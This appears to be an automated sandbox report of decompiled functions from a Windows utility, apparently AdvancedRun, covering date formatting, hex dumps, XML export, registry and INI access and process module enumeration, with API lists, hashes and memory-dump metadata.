timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404ED0(FILETIME* __eax, wchar_t* _a4) {
				struct _SYSTEMTIME _v20;
				long _v276;
				long _v532;
				FILETIME* _t15;

				_t15 = __eax;
				if(__eax->dwHighDateTime != 0 ||  *__eax != 0) {
					if(FileTimeToSystemTime(_t15,  &_v20) == 0 || _v20 <= 0x3e8) {
						goto L5;
					} else {
						GetDateFormatW(0x400, 1,  &_v20, 0,  &_v276, 0x80);
						GetTimeFormatW(0x400, 0,  &_v20, 0,  &_v532, 0x80);
						wcscpy(_a4,  &_v276);
						wcscat(_a4, " ");
						wcscat(_a4,  &_v532);
					}
				} else {
					L5:
					wcscpy(_a4, 0x40c4e8);
				}
				return _a4;
			}

0x00404ed0
0x00404edf
0x00404ef6
0x00000000
0x00404f00
0x00404f1c
0x00404f31
0x00404f41
0x00404f4e
0x00404f5d
0x00404f66
0x00404f69
0x00404f69
0x00404f71
0x00404f77
0x00404f7d

APIs

FileTimeToSystemTime.KERNEL32(?,?), ref: 00404EEE
GetDateFormatW.KERNEL32(00000400,00000001,000003E8,00000000,?,00000080,?,?,?,?), ref: 00404F1C
GetTimeFormatW.KERNEL32(00000400,00000000,000003E8,00000000,?,00000080,?,?,?,?), ref: 00404F31
wcscpy.MSVCRT ref: 00404F41
wcscat.MSVCRT ref: 00404F4E
wcscat.MSVCRT ref: 00404F5D
wcscpy.MSVCRT ref: 00404F71

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Time$Formatwcscatwcscpy$DateFileSystem
String ID:
API String ID: 1331804452-0
Opcode ID: bcd4d34c10f2eb1284b4297ba1ca8defa1a10ff7f0e8a8f4937edf2a6ab2f069
Instruction ID: 27f756489727a3478797c508db698983d473b6c4fef27ef98cb5a9ae0a7a07e8
Opcode Fuzzy Hash: bcd4d34c10f2eb1284b4297ba1ca8defa1a10ff7f0e8a8f4937edf2a6ab2f069
Instruction Fuzzy Hash: 951160B2840119EBDB11AB94DC85EFE776CFB44304F04457ABA05B6090D774AA858BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00404FE0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E00404FE0(wchar_t* __edi, intOrPtr _a4, signed int _a8) {
				void _v514;
				long _v516;
				wchar_t* _t34;
				signed int _t35;
				void* _t36;
				void* _t37;

				_t34 = __edi;
				_v516 = _v516 & 0x00000000;
				memset( &_v514, 0, 0x1fc);
				 *__edi =  *__edi & 0x00000000;
				_t37 = _t36 + 0xc;
				_t35 = 0;
				do {
					_push( *(_t35 + _a4) & 0x000000ff);
					_push(L"%2.2X");
					_push(0xff);
					_push( &_v516);
					L0040B1EC();
					_t37 = _t37 + 0x10;
					if(_t35 > 0) {
						wcscat(_t34, " ");
					}
					if(_a8 > 0) {
						asm("cdq");
						if(_t35 % _a8 == 0) {
							wcscat(_t34, L"  ");
						}
					}
					wcscat(_t34,  &_v516);
					_t35 = _t35 + 1;
				} while (_t35 < 0x80);
				return _t34;
			}

APIs

memset.MSVCRT ref: 00405000
_snwprintf.MSVCRT ref: 00405027
wcscat.MSVCRT ref: 00405039
wcscat.MSVCRT ref: 00405056
wcscat.MSVCRT ref: 00405065

Strings

%2.2X, xrefs: 00405016

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: wcscat$_snwprintfmemset
String ID: %2.2X
API String ID: 2521778956-791839006
Opcode ID: 34c89676a934ea4f3d268c8f85442ed9bc59df14bbff203197c18b8f91f69b12
Instruction ID: 93e5f8641594d75a0278127c9762c797554eaad4f41234795e116b90c7bd1a0f
Opcode Fuzzy Hash: 34c89676a934ea4f3d268c8f85442ed9bc59df14bbff203197c18b8f91f69b12
Instruction Fuzzy Hash: FA01B57394072566E72067569C86BBB33ACEB41714F10407BFD14B91C2EB7CDA444ADC

Uniqueness

Uniqueness Score: -1.00%

Function 00407D80, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E00407D80(intOrPtr* __ecx, intOrPtr _a4) {
				void _v514;
				char _v516;
				void _v1026;
				char _v1028;
				void* __esi;
				intOrPtr* _t16;
				void* _t19;
				intOrPtr* _t29;
				char* _t31;

				_t29 = __ecx;
				_v516 = 0;
				memset( &_v514, 0, 0x1fc);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fc);
				_t16 = _t29;
				if( *((intOrPtr*)(_t29 + 0x24)) == 0) {
					_push(L"<?xml version=\"1.0\" encoding=\"ISO-8859-1\" ?>\r\n");
				} else {
					_push(L"<?xml version=\"1.0\" ?>\r\n");
				}
				E00407343(_t16);
				_t19 =  *((intOrPtr*)( *_t29 + 0x24))(_a4);
				_t31 =  &_v516;
				E00407250(_t31, _t19);
				_push(_t31);
				_push(L"<%s>\r\n");
				_push(0xff);
				_push( &_v1028);
				L0040B1EC();
				return E00407343(_t29, _a4,  &_v1028);
			}

APIs

memset.MSVCRT ref: 00407DA5
memset.MSVCRT ref: 00407DBA
_snwprintf.MSVCRT ref: 00407E04

Strings

<?xml version="1.0" ?>, xrefs: 00407DC9
<?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00407DD0
<%s>, xrefs: 00407DF3

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$_snwprintf
String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
API String ID: 3473751417-2880344631
Opcode ID: 9364f374d7518812a9165f05dfc0ba647ea39d808db9dc8e90e0893e61590c4e
Instruction ID: f522b8c77a058770ba0888167d6ec5df55c59d6d485a4440fbbc7c77367e2349
Opcode Fuzzy Hash: 9364f374d7518812a9165f05dfc0ba647ea39d808db9dc8e90e0893e61590c4e
Instruction Fuzzy Hash: E0019BB1E402197AD710A695CC45FBE766CEF44344F0001FBBA08F3191D738AE4586ED

Uniqueness

Uniqueness Score: -1.00%

Function 00403B3C, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E00403B3C(intOrPtr _a4) {
				void _v526;
				char _v528;
				void _v2574;
				char _v2576;
				void* __edi;
				intOrPtr _t29;

				_v2576 = 0;
				memset( &_v2574, 0, 0x7fe);
				_v528 = 0;
				memset( &_v526, 0, 0x208);
				E00404AD9( &_v528);
				_push( &_v528);
				_push(L"\"%s\" /EXEFilename \"%%1\"");
				_push(0x3ff);
				_push( &_v2576);
				L0040B1EC();
				_t37 = _a4 + 0xa68;
				E00404923(0x104, _a4 + 0xa68, L"exefile");
				E00404923(0x104, _a4 + 0xc72, L"Advanced Run");
				E00404923(0x3ff, _t37 + 0x414,  &_v2576);
				_t29 = E0040467A(_t37);
				 *((intOrPtr*)(_a4 + 0x167c)) = _t29;
				return _t29;
			}

0x00403b56
0x00403b5d
0x00403b6f
0x00403b76
0x00403b82
0x00403b8d
0x00403b8e
0x00403b99
0x00403b9e
0x00403b9f
0x00403ba7
0x00403bb9
0x00403bce
0x00403be5
0x00403bef
0x00403bf8
0x00403c00

APIs

memset.MSVCRT ref: 00403B5D
memset.MSVCRT ref: 00403B76

Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4

_snwprintf.MSVCRT ref: 00403B9F

Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940

Part of subcall function 0040467A: memset.MSVCRT ref: 004046AF
Part of subcall function 0040467A: _snwprintf.MSVCRT ref: 004046CD
Part of subcall function 0040467A: RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,?,?,?,?,?,00020019), ref: 004046E6
Part of subcall function 0040467A: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00020019), ref: 004046FA

Strings

exefile, xrefs: 00403BAD
"%s" /EXEFilename "%%1", xrefs: 00403B8E
Advanced Run, xrefs: 00403BBE

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$_snwprintf$CloseFileModuleNameOpenmemcpywcslen
String ID: "%s" /EXEFilename "%%1"$Advanced Run$exefile
API String ID: 1832587304-479876776
Opcode ID: 0a24b3981c90f53bc0afe707e01056d79404e7683c9323ccd1d0569bed7942f0
Instruction ID: c5548abdd2f98fe5b378efca96f69d72dd5acd8230f4ce7b006819db5738462c
Opcode Fuzzy Hash: 0a24b3981c90f53bc0afe707e01056d79404e7683c9323ccd1d0569bed7942f0
Instruction Fuzzy Hash: 6B11A3B29403186AD720E761CC05ACF776CDF45314F0041B6BA08B71C2D77C5B418B9E

Uniqueness

Uniqueness Score: -1.00%

Function 0040AFBE, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040AFBE(void* __esi, void* _a4, wchar_t* _a8, wchar_t* _a12) {
				void* _v8;
				int _v12;
				short _v524;
				char _v1036;
				void* __edi;

				wcscpy( &_v524, L"\\StringFileInfo\\");
				wcscat( &_v524, _a8);
				wcscat( &_v524, "\\");
				wcscat( &_v524, _a12);
				if(VerQueryValueW(_a4,  &_v524,  &_v8,  &_v12) == 0) {
					return 0;
				}
				_t34 =  &_v1036;
				E00404923(0xff,  &_v1036, _v8);
				E004049A2(_t34, __esi);
				return 1;
			}

0x0040afd3
0x0040afe2
0x0040aff3
0x0040b002
0x0040b023
0x00000000
0x0040b047
0x0040b02e
0x0040b034
0x0040b03c
0x00000000

APIs

wcscpy.MSVCRT ref: 0040AFD3
wcscat.MSVCRT ref: 0040AFE2
wcscat.MSVCRT ref: 0040AFF3
wcscat.MSVCRT ref: 0040B002
VerQueryValueW.VERSION(?,?,00000000,?), ref: 0040B01C

Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940

Part of subcall function 004049A2: lstrcpyW.KERNEL32(?,?), ref: 004049B7
Part of subcall function 004049A2: lstrlenW.KERNEL32(?), ref: 004049BE

Strings

\StringFileInfo\, xrefs: 0040AFCD

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: wcscat$QueryValuelstrcpylstrlenmemcpywcscpywcslen
String ID: \StringFileInfo\
API String ID: 393120378-2245444037
Opcode ID: 045a8df20043a551ca88a82222e75e8b313ea16cabd954164b3126fb0df90005
Instruction ID: 46c7c43bb965d9609608e4f6c2ae6b517043b349f439a100f6d085a340de75fe
Opcode Fuzzy Hash: 045a8df20043a551ca88a82222e75e8b313ea16cabd954164b3126fb0df90005
Instruction Fuzzy Hash: CF015EB290020DA6DB11EAA2CC45DDF776DDB44304F0005B6B654F2092EB3CDA969A98

Uniqueness

Uniqueness Score: -1.00%

Function 00405E8D, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON

Download Yara Rule

APIs

_snwprintf.MSVCRT ref: 00405EB2
wcscpy.MSVCRT ref: 00405ED5

Strings

dialog_%d, xrefs: 00405EA6
menu_%d, xrefs: 00405E96
strings, xrefs: 00405EC0
general, xrefs: 00405ECB

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintfwcscpy
String ID: dialog_%d$general$menu_%d$strings
API String ID: 999028693-502967061
Opcode ID: b64df2e80323ba4b17253e10f943d6139d2bc5d6bf6da17a7692c82038848a44
Instruction ID: fc2f6d5a95cb840c7437c23e5da9cc5f651b22c54dcbfaa02992beb3cb27aad2
Opcode Fuzzy Hash: b64df2e80323ba4b17253e10f943d6139d2bc5d6bf6da17a7692c82038848a44
Instruction Fuzzy Hash: CDE08C31A94B00B5E96423418DC7F2B2801DE90B14FB0083BF686B05C1E6BDBA0528DF

Uniqueness

Uniqueness Score: -1.00%

Function 004092F0, Relevance: 9.1, APIs: 6, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 35%

			E004092F0(void* __ecx, void* __eflags, long _a4, void _a8, intOrPtr _a12, long _a16, intOrPtr _a508, intOrPtr _a512, intOrPtr _a540, intOrPtr _a544, char _a552, char _a560, intOrPtr _a572, intOrPtr _a576, intOrPtr _a580, long _a1096, char _a1600, int _a1616, void _a1618, char _a2160) {
				void* _v0;
				intOrPtr _v4;
				intOrPtr _v8;
				unsigned int _v12;
				void* _v16;
				char _v20;
				char _v24;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				void* __edi;
				void* __esi;
				intOrPtr _t58;
				void* _t59;
				void* _t72;
				intOrPtr _t78;
				void _t89;
				signed int _t90;
				int _t98;
				signed int _t105;
				signed int _t106;

				_t106 = _t105 & 0xfffffff8;
				E0040B550(0x8874, __ecx);
				_t98 = 0;
				_a8 = 0;
				if(E00404BD3() == 0 ||  *0x4101bc == 0) {
					if( *0x4101b8 != _t98) {
						_t89 = _a4;
						_t58 =  *0x40f83c(8, _t89);
						_v8 = _t58;
						if(_t58 != 0xffffffff) {
							_v0 = 1;
							_a560 = 0x428;
							_t59 =  *0x40f834(_t58,  &_a560);
							while(_t59 != 0) {
								memset( &_a8, _t98, 0x21c);
								_a12 = _a580;
								_a8 = _t89;
								wcscpy( &_a16,  &_a1096);
								_a540 = _a576;
								_t106 = _t106 + 0x14;
								_a544 = _a572;
								_a552 = 0x428;
								if(E00409510(_a8,  &_a8) != 0) {
									_t59 =  *0x40f830(_v16,  &_a552);
									continue;
								}
								goto L18;
							}
							goto L18;
						}
					}
				} else {
					_t72 = OpenProcess(0x410, 0, _a4);
					_v0 = _t72;
					if(_t72 != 0) {
						_push( &_a4);
						_push(0x8000);
						_push( &_a2160);
						_push(_t72);
						if( *0x40f840() != 0) {
							_t6 =  &_v12;
							 *_t6 = _v12 >> 2;
							_v8 = 1;
							_t90 = 0;
							if( *_t6 != 0) {
								while(1) {
									_a1616 = _t98;
									memset( &_a1618, _t98, 0x208);
									memset( &_a8, _t98, 0x21c);
									_t78 =  *((intOrPtr*)(_t106 + 0x898 + _t90 * 4));
									_t106 = _t106 + 0x18;
									_a8 = _a4;
									_a12 = _t78;
									 *0x40f838(_v16, _t78,  &_a1616, 0x104);
									E0040920A( &_v0,  &_a1600);
									_push(0xc);
									_push( &_v20);
									_push(_v4);
									_push(_v32);
									if( *0x40f844() != 0) {
										_a508 = _v32;
										_a512 = _v36;
									}
									if(E00409510(_a8,  &_v24) == 0) {
										goto L18;
									}
									_t90 = _t90 + 1;
									if(_t90 < _v44) {
										_t98 = 0;
										continue;
									} else {
									}
									goto L18;
								}
							}
						}
						L18:
						CloseHandle(_v16);
					}
				}
				return _a8;
			}

0x004092f3
0x004092fb
0x00409303
0x00409305
0x00409310
0x00409439
0x0040943f
0x00409445
0x0040944e
0x00409452
0x00409466
0x0040946e
0x00409475
0x004094f7
0x00409488
0x00409494
0x004094a5
0x004094a9
0x004094b5
0x004094c3
0x004094c6
0x004094d5
0x004094e3
0x004094f1
0x00000000
0x004094f1
0x00000000
0x004094e3
0x00000000
0x004094f7
0x00409452
0x00409322
0x0040932b
0x00409333
0x00409337
0x00409341
0x00409342
0x0040934e
0x0040934f
0x00409358
0x0040935e
0x0040935e
0x00409363
0x0040936b
0x0040936d
0x00409377
0x00409385
0x0040938d
0x0040939d
0x004093a5
0x004093ac
0x004093b4
0x004093c5
0x004093c9
0x004093da
0x004093df
0x004093e5
0x004093e6
0x004093ea
0x004093f6
0x004093fc
0x00409407
0x00409407
0x0040941d
0x00000000
0x00000000
0x00409423
0x00409428
0x00409375
0x00000000
0x00000000
0x0040942e
0x00000000
0x00409428
0x00409377
0x0040936d
0x004094fb
0x004094ff
0x004094ff
0x00409337
0x0040950f

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,00408CE3,00000000,00000000), ref: 0040932B
memset.MSVCRT ref: 0040938D
memset.MSVCRT ref: 0040939D

Part of subcall function 0040920A: wcscpy.MSVCRT ref: 00409233

memset.MSVCRT ref: 00409488
wcscpy.MSVCRT ref: 004094A9
CloseHandle.KERNEL32(?,00408CE3,?,?,?,00408CE3,00000000,00000000), ref: 004094FF

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$wcscpy$CloseHandleOpenProcess
String ID:
API String ID: 3300951397-0
Opcode ID: 35b1b47fb41be2c3e4820f38a09934af673dc0f51eb17e2be69c8f32b4af62fe
Instruction ID: b0ac5d6e05c2becfea0857ee93370de63ec0533c429aeeb167529e34c4b0c205
Opcode Fuzzy Hash: 35b1b47fb41be2c3e4820f38a09934af673dc0f51eb17e2be69c8f32b4af62fe
Instruction Fuzzy Hash: AE512A71108345ABD720DF65CC88A9BB7E8FFC4304F404A3EF989A2291DB75D945CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00402EC8, Relevance: 9.0, APIs: 6, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E00402EC8(void* __ebx) {
				struct tagRECT _v20;
				struct tagPAINTSTRUCT _v84;

				GetClientRect( *(__ebx + 0x10),  &_v20);
				_v20.left = _v20.right - GetSystemMetrics(0x15);
				_v20.top = _v20.bottom - GetSystemMetrics(0x14);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				DrawFrameControl(BeginPaint( *(__ebx + 0x10),  &_v84),  &_v20, 3, 8);
				return EndPaint( *(__ebx + 0x10),  &_v84);
			}

0x00402ed7
0x00402eee
0x00402ef8
0x00402f00
0x00402f01
0x00402f05
0x00402f0a
0x00402f1a
0x00402f30

APIs

GetClientRect.USER32 ref: 00402ED7
GetSystemMetrics.USER32 ref: 00402EE5
GetSystemMetrics.USER32 ref: 00402EF1
BeginPaint.USER32(?,?), ref: 00402F0B
DrawFrameControl.USER32 ref: 00402F1A
EndPaint.USER32(?,?), ref: 00402F27

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
String ID:
API String ID: 19018683-0
Opcode ID: 8c0e1e97105e41a4185fd691eb38b3eaa50651c9f1af749464abe97b92a3298f
Instruction ID: c8721ad6730a543cd54d50ae751cb56b62cc93be397439d4b1c9778783e315ec
Opcode Fuzzy Hash: 8c0e1e97105e41a4185fd691eb38b3eaa50651c9f1af749464abe97b92a3298f
Instruction Fuzzy Hash: 8C01EC72900218EFDF04DFA4DD859FE7B79FB44301F000569EA11AA195DA71A904CF90

Uniqueness

Uniqueness Score: -1.00%

Function 004079A4, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E004079A4(void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				void _v514;
				signed short _v516;
				signed short* _t34;
				signed int _t37;
				void* _t40;
				signed short* _t44;
				void* _t46;

				_t40 = __edi;
				E00407343(__edi, _a4, L"<item>\r\n");
				_t37 = 0;
				if( *((intOrPtr*)(__edi + 0x2c)) > 0) {
					do {
						_v516 = _v516 & 0x00000000;
						memset( &_v514, 0, 0x1fc);
						E0040ADF1( *((intOrPtr*)( *_a8))( *( *((intOrPtr*)(__edi + 0x30)) + _t37 * 4),  *((intOrPtr*)(__edi + 0x60))),  *((intOrPtr*)(__edi + 0x64)));
						_t44 =  &_v516;
						E00407250(_t44,  *((intOrPtr*)( *( *((intOrPtr*)(__edi + 0x30)) + _t37 * 4) * 0x14 +  *((intOrPtr*)(__edi + 0x40)) + 0x10)));
						_t34 = _t44;
						_push(_t34);
						_push( *((intOrPtr*)(__edi + 0x64)));
						_push(_t34);
						_push(L"<%s>%s</%s>\r\n");
						_push(0x2000);
						_push( *((intOrPtr*)(__edi + 0x68)));
						L0040B1EC();
						_t46 = _t46 + 0x24;
						E00407343(__edi, _a4,  *((intOrPtr*)(__edi + 0x68)));
						_t37 = _t37 + 1;
					} while (_t37 <  *((intOrPtr*)(__edi + 0x2c)));
				}
				return E00407343(_t40, _a4, L"</item>\r\n");
			}

APIs

memset.MSVCRT ref: 004079DB

Part of subcall function 0040ADF1: memcpy.MSVCRT ref: 0040AE6E

Part of subcall function 00407250: wcscpy.MSVCRT ref: 00407255
Part of subcall function 00407250: _wcslwr.MSVCRT ref: 00407288

_snwprintf.MSVCRT ref: 00407A25

Strings

<item>, xrefs: 004079AE
</item>, xrefs: 00407A41
<%s>%s</%s>, xrefs: 00407A18

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
String ID: <%s>%s</%s>$</item>$<item>
API String ID: 1775345501-2769808009
Opcode ID: 3db2232b312ed916784b241718d450bfb00e2b25eb8021401c0f03919c4bf03b
Instruction ID: c8ba369f0531ab1f4cd0c6f6a7ba1592bf00f2a9533aec28b16f0bdd84d8fa76
Opcode Fuzzy Hash: 3db2232b312ed916784b241718d450bfb00e2b25eb8021401c0f03919c4bf03b
Instruction Fuzzy Hash: 3D119131A40219BFDB21AB65CC86E5A7B25FF04308F00006AFD0477692C739B965DBD9

Uniqueness

Uniqueness Score: -1.00%

Function 0040467A, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44
registryCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E0040467A(void* __edi) {
				signed int _v8;
				void* _v12;
				void* _v16;
				void _v2062;
				short _v2064;
				int _t16;

				_v8 = _v8 & 0x00000000;
				_t16 = E004043F8( &_v12, 0x20019);
				if(_t16 == 0) {
					_v2064 = _v2064 & _t16;
					memset( &_v2062, _t16, 0x7fe);
					_push(__edi + 0x20a);
					_push(L"%s\\shell\\%s");
					_push(0x3ff);
					_push( &_v2064);
					L0040B1EC();
					if(RegOpenKeyExW(_v12,  &_v2064, 0, 0x20019,  &_v16) == 0) {
						_v8 = 1;
						RegCloseKey(_v16);
					}
				}
				return _v8;
			}

0x00404683
0x00404692
0x00404699
0x0040469b
0x004046af
0x004046ba
0x004046bc
0x004046c7
0x004046cc
0x004046cd
0x004046ee
0x004046f3
0x004046fa
0x004046fa
0x004046ee
0x00404705

APIs

memset.MSVCRT ref: 004046AF
_snwprintf.MSVCRT ref: 004046CD
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,?,?,?,?,?,00020019), ref: 004046E6
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00020019), ref: 004046FA

Strings

%s\shell\%s, xrefs: 004046BC

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseOpen_snwprintfmemset
String ID: %s\shell\%s
API String ID: 1458959524-3196117466
Opcode ID: dd937bb9006710e66f977af40412b0b6fd133ebddff1bc1205fab9b1dc2b10fe
Instruction ID: 1855bd24da60c853c30f7b3e18bb60aca338c900c60696cbbcdbf1fba26ecf92
Opcode Fuzzy Hash: dd937bb9006710e66f977af40412b0b6fd133ebddff1bc1205fab9b1dc2b10fe
Instruction Fuzzy Hash: 20011EB5D00218FADB109BD1DD45FDAB7BCEF44314F0041B6AA04F2181EB749B489BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00409D5F, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E00409D5F(void* __ecx, wchar_t* __esi, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR* _a16, long _a20, WCHAR* _a24) {
				signed short _v131076;

				_t25 = __esi;
				E0040B550(0x20000, __ecx);
				if(_a4 == 0) {
					return GetPrivateProfileStringW(_a8, _a12, _a16, __esi, _a20, _a24);
				} else {
					if(__esi == 0 || wcschr(__esi, 0x22) == 0) {
						_push(_a24);
					} else {
						_v131076 = _v131076 & 0x00000000;
						_push(__esi);
						_push(L"\"%s\"");
						_push(0xfffe);
						_push( &_v131076);
						L0040B1EC();
						_push(_a24);
						_push( &_v131076);
					}
					return WritePrivateProfileStringW(_a8, _a12, ??, ??);
				}
			}

APIs

wcschr.MSVCRT ref: 00409D79
_snwprintf.MSVCRT ref: 00409D9E
WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00409DBC
GetPrivateProfileStringW.KERNEL32 ref: 00409DD4

Strings

"%s", xrefs: 00409D8D

Memory Dump Source

Source File: 00000008.00000002.690646676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.690636866.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690686380.000000000040C000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.690704685.000000000040F000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.690718573.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: PrivateProfileString$Write_snwprintfwcschr
String ID: "%s"
API String ID: 1343145685-3297466227
Opcode ID: ba2a529124e3a207c998afa530794a8b3af16421fe15764eebdae90aacee263b
Instruction ID: cff84325bbeeabecfb89bf19508a3778b9d9768fc6139f0f3fcaa17558a1ecc1
Opcode Fuzzy Hash: ba2a529124e3a207c998afa530794a8b3af16421fe15764eebdae90aacee263b
Instruction Fuzzy Hash: BA018B3244421AFADF219F90DC45FDA3B6AEF04348F008065BA14701E3D739C921DB98

Uniqueness

Uniqueness Score: -1.00%

Function 004047D2, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31
windowCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E004047D2(long __ecx, void* __eflags, struct HWND__* _a4) {
				char _v2052;
				short _v4100;
				void* __edi;
				long _t15;
				long _t16;

				_t15 = __ecx;
				E0040B550(0x1000, __ecx);
				_t16 = _t15;
				if(_t16 == 0) {
					_t16 = GetLastError();
				}
				E00404706(_t16,  &_v2052);
				_push( &_v2052);
				_push(_t16);
				_push(L"Error %d: %s");
				_push(0x400);
				_push( &_v4100);
				L0040B1EC();
				return MessageBoxW(_a4,  &_v4100, L"Error", 0x30);
			}

0x004047d2
0x004047da
0x004047e0
0x004047e4
0x004047ec
0x004047ec
0x004047f5
0x00404800
0x00404801
0x00404802
0x0040480d
0x00404812
